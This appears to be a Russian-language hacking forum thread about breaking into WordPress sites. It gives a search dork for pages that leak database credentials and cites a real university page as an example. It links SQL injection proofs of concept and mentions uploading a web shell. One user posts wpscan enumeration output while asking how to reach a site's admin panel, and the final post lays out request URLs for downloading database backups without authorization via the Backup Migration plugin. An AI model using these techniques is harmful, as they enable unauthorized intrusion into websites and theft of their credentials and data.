В связи с переходом многих хостинг компаний на PHP7 и другие версии, в которых отсутствуют некоторые функции, стали появляться интересные сообщения об ошибках, включающие чувствительную информацию. Следующий пример демонстрирует раскрытие данных для подключения к базе данных. Spoiler: Click Code: depts.washington.edu/leaders1/elizabeth-smith/feed/ Dork: Code: intext:Stack trace #0 wpdb->__construct(
Wordpress <= 4.8.2 SQL Injection POC http://blog.vulspy.com/2017/11/09/Wordpress-4-8-2-SQL-Injection-POC/ Double prepare https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
нашел способ заливки шелла в wordpress при наличии подключения к mysql и админки (при условие что все папки под запись закрыты или стоит .htaccess) или я изобрел велосипед?
Подскажите можно ли получть доступ к админке? Один логин нашелся. Можно в личку. Spoiler: wpscan [+] Headers | Interesting Entries: | - Server: Apache | - X-Redirect-By: WordPress | - Upgrade: h2,h2c | - X-Endurance-Cache-Level: 2 | - X-nginx-cache: WordPress | Found By: Headers (Passive Detection) | Confidence: 100% [+] robots.txt found: http://example.com/robots.txt | Found By: Robots Txt (Aggressive Detection) | Confidence: 100% [+] XML-RPC seems to be enabled: http://example.com/xmlrpc.php | Found By: Direct Access (Aggressive Detection) | Confidence: 100% | References: | - http://codex.wordpress.org/XML-RPC_Pingback_API | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/ [+] WordPress readme found: http://example.com/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% [+] This site has 'Must Use Plugins': http://example.com/wp-content/mu-plugins/ | Found By: Direct Access (Aggressive Detection) | Confidence: 80% | Reference: http://codex.wordpress.org/Must_Use_Plugins [+] The external WP-Cron seems to be enabled: http://example.com/wp-cron.php | Found By: Direct Access (Aggressive Detection) | Confidence: 60% | References: | - https://www.iplocation.net/defend-wordpress-from-ddos | - https://github.com/wpscanteam/wpscan/issues/1299 [+] WordPress version 6.0.2 identified (Latest, released on 2022-08-30). | Found By: Emoji Settings (Passive Detection) | - http://www.example.com/60274a2.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=6.0.2' | Confirmed By: Meta Generator (Passive Detection) | - http://www.example.com/60274a2.html, Match: 'WordPress 6.0.2' The main theme could not be detected. [+] Enumerating Vulnerable Plugins (via Passive Methods) [+] Checking Plugin Versions (via Passive and Aggressive Methods) No plugins Found. [+] Enumerating Users (via Passive and Aggressive Methods) Brute Forcing Author IDs - Time: 00:00:18 <==========================================================> (10 / 10) 100.00% Time: 00:00:18 User(s) Identified: [+] admin | Found By: Wp Json Api (Aggressive Detection) | - http://example.com/wp-json/wp/v2/users/?per_page=100&page=1 | Confirmed By: Oembed API - Author URL (Aggressive Detection) | - http://example.com/wp-json/oembed/1.0/embed?url=http://example.com/&format=json [+] WPScan DB API OK | Plan: free | Requests Done (during the scan): 3 | Requests Remaining: 72 [+] Finished: Fri Sep 16 09:54:27 2022 [+] Requests Done: 64 [+] Cached Requests: 7 [+] Data Sent: 17.824 KB [+] Data Received: 885.887 KB [+] Memory used: 195.398 MB [+] Elapsed time: 00:00:48
В плагине "Backup Migration" есть возможность неавторизированым слить бэкап базы, который создал админ, но не удалил. Отсюда вытаскиваем имя zip файла. https://wordpress-5-0-19.localhost/?backup-migration=BMI_BACKUP&backup-id=md5summary.php Сливаем бэкап. https://wordpress-5-0-19.localhost/...ckup_2023-08-04_05_29_36_Tu54wvHxQhRqFf0A.zip Тестил на 1.2.9